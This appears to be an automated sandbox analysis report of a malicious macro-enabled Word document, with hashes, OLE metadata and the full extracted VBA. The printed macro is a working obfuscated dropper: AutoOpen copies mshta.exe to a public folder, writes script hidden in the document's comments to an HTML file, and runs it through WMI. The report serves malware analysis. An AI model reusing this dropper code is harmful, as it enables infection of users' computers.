Entropy (8bit):	7.894769517768764
TrID:	Word Microsoft Office Open XML Format document with Macro (52004/1) 33.99% Word Microsoft Office Open XML Format document (49504/1) 32.35% Word Microsoft Office Open XML Format document (43504/1) 28.43% ZIP compressed archive (8000/1) 5.23%
File name:	documenti 12.01.20.doc
File size:	93665
MD5:	f530de77053a5c25a94f930bb954bcf8
SHA1:	46cbf6e7a7ad04e3586c88a7a0d2cbcb141c3ec4
SHA256:	1e70cc7a76bf59a5b559e496a0e83f91e13526533c89f001619ca70324ebfd82
SHA512:	f35b4d0cf4d0665117f58792a4d0fe51f13210921c1ac9d715160a4f9708e09817c6f0ab65e2c37c493a22d41fdacaaba1775fb8cc205b9d3e4855258892f916
SSDEEP:	1536:A/rBcK6fNcSI7O8hRe7Il+Oy4wUOAL2wPbnQ/Tz6CaC/B2RrNbSxQml:w6lfNu/Q7Y9wkFncTZB2RrN9S
File Content Preview:	PK..........!.[...............[Content_Types].xml ...(.........................................................................................................................................................................................................

File Icon


Icon Hash:	74f4c4c6c1cac4d8

Static OLE Info

General
Document Type:	OpenXML
Number of OLE Files:	1

OLE File "/opt/package/joesandbox/database/analysis/326338/sample/documenti 12.01.20.doc"

Indicators
Has Summary Info:	False
Application Name:	unknown
Encrypted Document:	False
Contains Word Document Stream:
Contains Workbook/Book Stream:
Contains PowerPoint Document Stream:
Contains Visio Document Stream:
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	True

Summary
Template:	Normal.dotm
Total Edit Time:	0
Number of Pages:	1
Number of Words:	0
Number of Characters:	0
Creating Application:	Microsoft Office Word
Security:	0

Document Summary
Number of Lines:	3
Number of Paragraphs:	0
Thumbnail Scaling Desired:	false
Company:
Contains Dirty Links:	false
Shared Document:	false
Changed Hyperlinks:	false
Application Version:	16.0000

Streams with VBA

VBA File Name: ThisDocument.cls, Stream Size: 1127

General
Stream Path:	VBA/ThisDocument
VBA File Name:	ThisDocument.cls
Stream Size:	1127
Data ASCII:	. . . . . . . . . 4 . . . . . . . . . . . b . . . p . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . s . . : . . \\ L . . # Y * . . . . . g ~ . . L . o . . . . . . . . . . . . . . . . . . . . . . . . . . ! } . . . . u D . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . ! } . . . . u D . 1 . . . . . . s . . : . . \\ L . . # Y * . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 06 00 01 00 00 34 03 00 00 e4 00 00 00 ea 01 00 00 62 03 00 00 70 03 00 00 c4 03 00 00 00 00 00 00 01 00 00 00 0e 35 d7 f8 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 70 00 ff ff 00 00 73 04 ec 3a 99 d0 5c 4c bb d7 23 59 2a 88 09 7f 14 fb 67 20 7e 8f de 4c 81 6f 96 90 b4 fc f3 9f 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
VB_Creatable
VB_Name
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived
"ThisDocument"

VBA Code

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

VBA File Name: a7A5m.bas, Stream Size: 5178

General
Stream Path:	VBA/a7A5m
VBA File Name:	a7A5m.bas
Stream Size:	5178
Data ASCII:	. . . . . . . . . j . . . . . . . . . . . . . . . q . . . ] . . . . . . . . . . . . 5 > Q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 00 f0 00 00 00 6a 03 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 71 03 00 00 5d 0e 00 00 00 00 00 00 01 00 00 00 0e 35 3e 51 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
joins
effigy
photo
maidenhead
torah
imprint
co-operative
unfavorable
Collects
Public
Diagram
aSGxU
Makeup
father
abhorred
controls
Cutting
unpropitious
minerva
Training
Adventures
unveil
Mysimon
Replace(aPENSZ,
slanderous
webcast
savoury
nucleus
liberia
footstool
Adroit
nutmeg
greenish
inter
adHaPl
Hallow
warner
manger
ethical
Since
pickled
Routing
Sniff
Giants
Nickel
seventy-four
fellowship
shadow
Maudlin
stefan
Tribal
tabooed
akSqK(aPENSZ)
expire
along
vaccine
reaction
Rancid
patricia
lackey
coxcomb
Workflow
axIuO
succeed
daisy
syria
Receptacle
Defraud
Knowledge
Contacts
Sorcery
transit
undersigned
leniency
sacrilegious
aYKyQ
dearborn
insulation
detecting
cloud
Glucose
willy
wealth
probity
exhort
Accelerated
ballast
Articulated
transverse
azUoN
Outcome
Specifies
graphic
brandishing
Attribute
gamespot
rectangular
patients
awAlq()
tumults
Enemies
Basketball
VB_Name
Gloating
(axSiN)
Issue
counterfeit
Function
Retrospect
unadulterated
comfort
hybrid
Munich
brandon
delay
located
actors
commentary
akSqK
cubic
stacy
photographers
Airport
characters
dappled
chris
mangrove
knack
Generates
statute
Attorney
coupling
navel
Pyramid
steady
bakery
Boolean
Terrace
Verzeichnis
turnpike

VBA Code

Attribute VB_Name = "a7A5m"
Function aSGxU(aie8CL)
' Attorney delay nw ballast
' Soot tyre counterfeit
' Collects patients steady
' Knowledge dappled jvc
' Basketball effigy ethical expire
' Outcome imprint characters wc mangrove unfavorable ween
' Mysimon liberia
' Accelerated roth cubic daisy unadulterated
' Wr actors manger
' Sniff commentary cede
' Lay abhorred turnpike ag cult
' Terrace minerva
' Diagram wealth slanderous mae
' Boolean greenish along
' Retrospect located transverse lackey weld
' Issue savoury bakery syria
' Giants rectangular spas
' Cutting
' Adroit knack arg gone do leniency
' Contacts goto head sacrilegious
' Routing chris
' Airport seventy-four gens cz
' Gloating photographers statute exhort ir
' Makeup nutmeg sims coupling reaction roth webcast
' Suck op. father
' Glucose unpropitious
' Flea
' Maudlin co-operative rib controls
' Specifies comfort tabooed warner
' Sorcery succeed po graphic
For a6mGn = Len(aie8CL) To 1 Step -1
azUoN = Mid(aie8CL, a6mGn, 1)
adHaPl = adHaPl & azUoN
Next
aSGxU = adHaPl
End Function
Public Function akSqK(aPENSZ)
akSqK = Replace(aPENSZ, a7odJ, "")
End Function
Sub awAlq()
' Laud footstool undersigned
' Tribal joins probity fellowship inter maidenhead
' Generates
' Army pup
aYKyQ
' Verzeichnis
' Enemies hybrid
' Adventures torah
' Foam willy gamespot patricia
axIuO
' Defraud photo dearborn shadow tumults
' Rancid kirk knack cloud
' Bush vaccine insulation
' Pyramid unveil crew mem brandishing
' Articulated pickled stacy brandon transit
' Munich ira coxcomb
' Nickel stefan
' Hallow
' Workflow
' Training nucleus
' Receptacle detecting navel
' Since
agPh8 = akSqK(aSGxU(a3IdJQ))
CreateObject(agPh8).create (axSiN)
End Sub

VBA File Name: aH8xms.bas, Stream Size: 863

General
Stream Path:	VBA/aH8xms
VBA File Name:	aH8xms.bas
Stream Size:	863
Data ASCII:	. . . . . . . . . z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5 . ] . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 00 f0 00 00 00 7a 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 81 02 00 00 11 03 00 00 00 00 00 00 01 00 00 00 0e 35 b2 5d 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
awAlq
Attribute
AutoOpen()
VB_Name

VBA Code
`Attribute VB_Name = "aH8xms" Sub AutoOpen() awAlq End Sub`

VBA File Name: aIsb7.bas, Stream Size: 5040

General
Stream Path:	VBA/aIsb7
VBA File Name:	aIsb7.bas
Stream Size:	5040
Data ASCII:	. . . . . . . . . : . . . . . . . . . . . . . . . A . . . 1 . . . . . . . . . . . . 5 . w . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 00 f0 00 00 00 3a 06 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 41 06 00 00 31 0f 00 00 00 00 00 00 01 00 00 00 0e 35 df 77 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
Blackmail
developer
valuation
plume
aMslO(aucpr)
amZcqK
Berkeley
plenipotentiary
translations
aYzBn
roundabout
aVzRp()
(akSqK(aucpr))
Pronoun
aCqnt
positions
teams
purveyor
arthur
louis
soviet
Tatiana
axSiN
motherboard
numeric
Idiom
perspective
dialectic
shallows
gazette
Discovery
felony
unconvinced
roller
Proven
medicare
ElseIf
clime
cartwright
importunate
moiety
guess
Bulldog
adeKx
Bereavement
asses
participated
Waylaid
confiscate
grandchildren
Barely
axSiN()
Shutter
Coiled
realty
compute
Precedence
vapid
Attribute
handcuffs
aaqRT
transparency
specialized
propaganda
VB_Name
calvin
telephony
everyday
Function
baste
demesne
switching
Springer
Modes
Luggage
Avant
catalog
Milky
hearthstone
tracy
expand
aMslO
Johns
sunset
requires

VBA Code

Attribute VB_Name = "aIsb7"
Function aCqnt(ayM1o)
' Precedence sur soviet wall foal importunate vapid
' Springer telephony specialized moiety catalog
' Blackmail
aCqnt = akSqK(ayM1o)
End Function
Function aMslO(aucpr)
' Proven luis felony
' Waylaid compute clime fit
' None numeric expand
' Barely asses teams lil
aMslO = (akSqK(aucpr))
End Function
Function ayUxA2(aT2PX)
' Bird
' Bereavement participated positions
' Veal shallows cartwright louis confiscate sunset
' Berkeley able transparency perspective requires hearthstone
ayUxA2 = (akSqK(aT2PX))
End Function
Function axSiN()
adeKx = aMslO(adkJvD(1))
aaqRT = ayUxA2(adkJvD(2))
axSiN = adeKx & " " & aaqRT
End Function
Sub aVzRp()
acIr6u = aCqnt(adkJvD(0))
adeKx = aMslO(adkJvD(1))
amZcqK acIr6u, adeKx
End Sub
Function a3ox6(a48o6)
a3ox6 = a48o6 + -158 + 184
End Function
Function a3eJx(aFP9Ao)
If aFP9Ao = 0 Then
a3eJx = -6824 + 6825
' Pronoun
' Veal guess roundabout
' Discovery
' Modes arthur
' Bulldog tracy
' Johns gulp rice
' Sync motherboard nuts lens propaganda realty
' Idiom unconvinced handcuffs tcp
' Shutter roller valuation sen
' Coop medicare cons grandchildren
' Tatiana kite everyday dialectic switching calvin baste
' Milky plume demesne
' Coiled purveyor translations gazette plenipotentiary
' Luggage developer baby
' Avant
ElseIf aFP9Ao = 5 Then
a3eJx = -63 + 160
Else
a3eJx = 1049 - 25
End If
End Function
Function aYzBn(a48o6, a20NB)
aYzBn = a48o6 - a20NB
End Function
Function a9vceZ(a48o6)
a9vceZ = Chr(a48o6)
End Function

VBA File Name: aOMv0.bas, Stream Size: 3156

General
Stream Path:	VBA/aOMv0
VBA File Name:	aOMv0.bas
Stream Size:	3156
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5 k > . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 00 f0 00 00 00 e2 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff e9 02 00 00 11 09 00 00 00 00 00 00 01 00 00 00 0e 35 6b 3e 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
causes
anFJy
exclusively
Truly
Browser
aYzBn(aDKIk,
smell
Searched
adBRr(anFJy)
Surrounding
recommendations
nazarene
Constitutes
proteins
delegation
String
aMnjk
commentator
zoological
trunk
Juvenile
pearly
ElseIf
Insider
learning
Oreilly
Asc(aMnjk)
Treasurer
alfred
aDKIk
Integer
limousine
Alexander
Respiratory
aJjwu)
abomination
delayed
Memoirs
Attribute
ascendancy
acclaim
Imprecation
VB_Name
wampum
Etymology
undeceive
Function
priory
humanities
relatives
sufficiency
aJjwu
unless
persons
(aDKIk
elusive
Stumped
turnpike

VBA Code

Attribute VB_Name = "aOMv0"
Function a6sXJE(a2cCM) As String
Dim as6h1W As Long
Dim aDKIk As Integer
Dim aJjwu As Integer
For as6h1W = 1 To VBA.Len(a2cCM) Step 1
' Stumped deck
' Juvenile abomination proteins
' Browser land ascendancy
' Truly
aJjwu = 0
' Tier alfred wampum delayed
' Searched zoological recommendations
' Gi
aMnjk = Mid(a2cCM, as6h1W, 1)
aDKIk = Asc(aMnjk)
' Memoirs relatives unless persons
' Oreilly turnpike
' Constitutes acclaim aura causes nor learning
' Alexander undeceive limousine tiny exclusively delegation
If (aDKIk > 64 And aDKIk < 91) Or (aDKIk > 96 And aDKIk < 123) Then
aJjwu = as8nLc
aDKIk = aYzBn(aDKIk, aJjwu)
' Respiratory sufficiency
' Imprecation priory pearly trunk
' Insider
' Egg
If aDKIk < a3eJx(5) And aDKIk > 83 Then
aDKIk = a3ox6(aDKIk)
ElseIf aDKIk < 128 - 63 Then
aDKIk = a3ox6(aDKIk)
End If
End If
anFJy = a9vceZ(aDKIk)
Mid$(a2cCM, as6h1W, 1) = adBRr(anFJy)
Next
' Surrounding fl humanities
' Num
' Etymology elusive md smell nazarene
' Treasurer commentator
a6sXJE = a2cCM
End Function

VBA File Name: aRZcbw.bas, Stream Size: 4810

General
Stream Path:	VBA/aRZcbw
VBA File Name:	aRZcbw.bas
Stream Size:	4810
Data ASCII:	. . . . . . . . . b . . . . . . . . . . . . . . . i . . . . . . . . . . . . . . . . 5 . ] . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 00 f0 00 00 00 62 04 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 69 04 00 00 b1 0d 00 00 00 00 00 00 01 00 00 00 0e 35 b6 5d 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
uninterested
determinate
Const
serenade
fraser
unreliable
Public
Contacting
adolescence
Kinswoman
wickedly
walnut
blots
undivided
vociferous
Antigua
Librarian
Indolence
procedures
encounter
Campaign
riven
Defined
belfast
tradespeople
dizziness
Abstention
Terrorist
Maidenhead
Anniversary
phosphoric
dialectic
enemies
Dentists
String
Upskirt
Nearly
undecided
affordable
timeline
Obviously
selective
offset
const
restrictions
would
shove
nomenclature
axIuO()
Gentle
Choosing
Maine
gamma
consulting
strumpet
schooling
Metallic
dietary
stumble
landscape
Straightforward
prove
deuteronomy
ravage
Ecological
brazilian
Integer
jerky
adroitly
walter
daughter-in-law
aVzRp
shell
supporters
catering
magnanimous
Stylish
haven
assets
boarding
holland
washington
"aRZcbw"
Attribute
abortion
economies
compensation
Receptor
latch
Dysentery
Variety
expanding
VB_Name
Esquire
Fisting
aYKyQ()
collapse
Function
completeness
cambodia
branch
elliptical
Entrust
reporting
demanding
consolidation
sceptic
priced
Gamma
Sensuality
unload
cover
brooded
strings

VBA Code

Attribute VB_Name = "aRZcbw"
Public Const a3IdJQ As String = "sse)cor)P_2)3ni)W:2)vmi)c\t)oor):st)mgm)niw"
Public Const a7odJ As String = ")"
Public Const as8nLc As Integer = 30602 / 2354
Function aG87E()
' Swum fraser washington
' Choosing vociferous
' Fisting jack
' Straightforward holland
End Function
Sub a7zcHr(aFtIw)
' Terrorist
' Kinswoman cambodia
' Abstention dell
' Maine determinate reporting strings magnanimous
' Doo catering serenade completeness cover
' Sensuality restrictions wickedly gamma
' Esquire unload
' Seal procedures daughter-in-law rain
' Ecological bier
' Receptor adroitly prove shell stumble dialectic latch sceptic
' Metallic brazilian expanding adolescence
' Obviously enemies jerky abortion
' Stylish demanding dietary
' Nearly deuteronomy
' Dory undecided walter uninterested landscape
' Gamma priced dizziness elliptical phosphoric branch
' Dentists consulting haven pies
' Lose supporters tradespeople blots
' Contacting
' Indolence strumpet shove
End Sub
Function a8qpd(afAV8)
' Gentle offset brooded boarding ravage assets
' Upskirt
' Entrust
' Campaign walnut timeline compensation view
' Maidenhead
' Variety riven undivided
' Anniversary fete
' Antigua collapse consolidation economies schooling
a8qpd = ActiveDocument.BuiltInDocumentProperties(afAV8)
End Function
Public Sub aYKyQ()
' Dysentery const selective open affordable encounter
' Defined would nomenclature unreliable
' Librarian belfast
If -342 + 406 < 164 Then
Call aVzRp
End If
End Sub
Public Sub axIuO()
If -342 + 406 < 164 Then
Call ah28l
End If
End Sub

VBA File Name: abh0Rg.bas, Stream Size: 4574

General
Stream Path:	VBA/abh0Rg
VBA File Name:	abh0Rg.bas
Stream Size:	4574
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 00 f0 00 00 00 ca 03 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff d1 03 00 00 e1 0c 00 00 00 00 00 00 01 00 00 00 0e 35 f9 c7 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
seasonal
pointed
Trains
Cancelled
theaters
swain
fullness
Public
sulky
referring
explain
compost
Aquarium
bullet
digit
downpour
Changelog
alabaster
denounce
Candy
self-evident
Homesickness
Machinist
statistical
Primacy
FreeFile
Love-making
Truism
companies
mother-in-law
Competition
subway
analytical
walrus
greenhouse
Flaccid
Webshots
Tress
tricolor
pacific
pretension
radius
Print
Drawn
FileNumber
Breakdown
diffidence
Biology
aicyF
illusory
wikipedia
poison
adBRr
dutch
suggesting
participation
Plaza
Sanity
Gaoler
impromptu
isthmus
Amber
sender
urges
changes
#FileNumber
confidentiality
tunisia
liqueur
Simulated
coding
venues
seashore
reservation
lighthouse
swimmer
Arising
aicyF)
lambent
sloped
shortening
fahrenheit
transcendent
#FileNumber,
flexible
Winsome
Georgia
option
Forests
lazarus
labourer
bukkake
Grenada
Surplus
Attribute
avhZYf
aVOhvn
Syntax
Close
devious
engineers
cleaner
VB_Name
lichen
Outwards
stubbornly
proceeds
trusted
Function
belle
depth
highlighted
FileCopy
louisville
Inconsistency
ungracious
opposite
adBRr(avhZYf)
disagree
Indisputable
Output
classroom
notch
Abandons
allegorical
Overhung
eddies
Adultery
Intact

VBA Code

Attribute VB_Name = "abh0Rg"
Public Function aX4od(aVOhvn, aA5aKj)
' Primacy
' Love-making walrus argo referring lighthouse pretension
' Tress una explain subway louisville
' Aquarium allegorical
' Inconsistency option
' Georgia flexible theaters
' Gaoler stubbornly labourer rolf
' Machinist tang lichen illusory
' Competition eddies muff cant
' Overhung
' Forests poison ex
' Indisputable liqueur
' Grenada
' Cancelled participation self-evident wikipedia highlighted opposite notch
' Sanity suggesting transcendent
' Webshots tricolor ungracious
' Changelog tunisia classroom diffidence
' Candy pointed companies
' Chen engineers
' Outwards coding joe
' Truism fahrenheit downpour isthmus
' Intact digit cleaner fullness lambent
' Breakdown fear
FileNumber = FreeFile
Open aVOhvn For Output As #FileNumber
' Eng urges bukkake
' Plaza confidentiality bunk
' Abandons swimmer alabaster
' Take swain reservation impromptu seasonal proceeds
Print #FileNumber, aA5aKj
' Biology bus disagree statistical depth compost
' Surplus greenhouse denounce
' Syntax
' Homesickness devious
Close #FileNumber
End Function
Sub amZcqK(aH6Oa, aicyF)
' Simulated pacific belle changes
' Winsome radius dutch
' Adultery soft mother-in-law trusted
' Sod lazarus gg analytical
' Amber
' Deep
' Drawn shortening
' Trains seashore venues sock sender prev
' Arising
' Flaccid sloped bullet sulky
FileCopy aH6Oa, aicyF
End Sub
Function adBRr(avhZYf)
adBRr = avhZYf
End Function

VBA File Name: adGbPA.bas, Stream Size: 4586

General
Stream Path:	VBA/adGbPA
VBA File Name:	adGbPA.bas
Stream Size:	4586
Data ASCII:	. . . . . . . . . J . . . . . . . . . . . . . . . Q . . . . . . . . . . . . . . . . 5 . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 00 f0 00 00 00 4a 03 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 51 03 00 00 f5 0c 00 00 00 00 00 00 01 00 00 00 0e 35 ee 60 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
intervals
octagonal
neigh
signs
astrology
legitimately
tittle
southwest
Technique
Matins
rejoin
Mephistopheles
intimidation
Burdensome
Responsibility
syllogism
Adobe
pounds
patrick
concave
Bequeath
Types
hesse
Select
pragmatic
excavation
magnificent
Vishnu
abolitionist
estimated
occurrence
Vassal
adkJvD
Armenia
Sanctified
dunbar
Systematically
component
Departments
modular
lucrative
Stating
Attica
derivation
attending
Bouquet
losses
leave-taking
Screens
fleshy
primal
Hybrid
)o)l)l)e)h)"),
Redden
utility
clustering
Unless
athens
totality
"adGbPA"
inferno
recurring
expiring
Sampson
languidly
Marrow
trojan
Attribute
Counsellor
Receipt
headers
Inactive
Sundown
lingo
charlotte
thirty-nine
aGSfMv()
VB_Name
Terminal
overran
Wicked
Function
silhouette
recovery
Mario
Infringement
Ticket
pichunter
chemist
Blue-black
brainless
cliff
complacent
compendium
aGSfMv
defilement
annuity
register
foundry
Displacement
remonstrate

VBA Code

Attribute VB_Name = "adGbPA"
Function aGSfMv()
aGSfMv = VBA.Split(aSGxU("l)m)t)h).)s)m)\)c)i)l)b)u)p)\)s)r)e)s)u)\):)C)|)m)o)c).)s)m)\)c)i)l)b)u)p)\)s)r)e)s)u)\):)C)|)e)x)e).)a)t)h)s)m)\)2)3)m)e)t)s)y)s)\)s)w)o)d)n)i)w)\):)c)|)o)t)o)m) )o)l)l)e)h)"), "|")
End Function
Function adkJvD(ah7ovz)
' Wicked magnificent lingo component
' Blue-black cliff compendium chemist silhouette
' Departments
' Matins hunt octagonal lens inferno
apa2Q = aGSfMv()
' Sundown modular kits estimated
' Redden cl losses
' Miss
' Terminal
' Sail
' Burdensome pragmatic fleshy complacent
' Attica utility
' Armenia remonstrate clustering southwest overran
' Displacement excavation attending signs root annuity
' Vassal
' Stating derivation
' Responsibility defilement curd hesse athens
' Bequeath
' Ticket
' Receipt patrick
' Counsellor recovery abolitionist
' Bouquet headers
' Adobe
' Vs. register
Select Case ah7ovz
' Hybrid dung ewe
' Sanctified rejoin primal
' Systematically languidly
' Technique thirty-nine pounds legitimately
Case 0:
' Screens
' Saga foundry neigh pichunter dunbar tale syllogism
' Marrow trojan astrology row
' Inactive
adkJvD = apa2Q(1)
' Unless intervals
' Sampson lucrative
' Vishnu tittle charlotte
' Infringement recurring leave-taking
Case 1:
adkJvD = apa2Q(2)
' Mario
' Types expiring brainless occurrence mf intimidation
' Mephistopheles concave totality
Case 2:
adkJvD = apa2Q(3)
End Select
End Function
Sub ah28l()
aocn4g = ayUxA2(adkJvD(2))
aX4od aocn4g, a6sXJE(a8qpd("comments"))
End Sub

Streams

Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 618

General
Stream Path:	PROJECT
File Type:	ASCII text, with CRLF line terminators
Stream Size:	618
Entropy:	5.34267626544
Base64 Encoded:	True
Data ASCII:	I D = " { 8 6 2 6 2 4 0 6 - 3 0 4 D - 4 E F A - A 4 4 C - C 5 5 4 C 4 7 8 6 1 3 8 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . M o d u l e = a H 8 x m s . . M o d u l e = a R Z c b w . . M o d u l e = a b h 0 R g . . M o d u l e = a 7 A 5 m . . M o d u l e = a d G b P A . . M o d u l e = a I s b 7 . . M o d u l e = a O M v 0 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 1 C
Data Raw:	49 44 3d 22 7b 38 36 32 36 32 34 30 36 2d 33 30 34 44 2d 34 45 46 41 2d 41 34 34 43 2d 43 35 35 34 43 34 37 38 36 31 33 38 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 61 48 38 78 6d 73 0d 0a 4d 6f 64 75 6c 65 3d 61 52 5a 63 62 77 0d 0a 4d 6f 64 75 6c 65 3d 61 62 68 30 52 67 0d 0a 4d 6f 64 75

Stream Path: PROJECTwm, File Type: data, Stream Size: 179

General
Stream Path:	PROJECTwm
File Type:	data
Stream Size:	179
Entropy:	3.66892704793
Base64 Encoded:	True
Data ASCII:	T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . a H 8 x m s . a . H . 8 . x . m . s . . . a R Z c b w . a . R . Z . c . b . w . . . a b h 0 R g . a . b . h . 0 . R . g . . . a 7 A 5 m . a . 7 . A . 5 . m . . . a d G b P A . a . d . G . b . P . A . . . a I s b 7 . a . I . s . b . 7 . . . a O M v 0 . a . O . M . v . 0 . . . . .
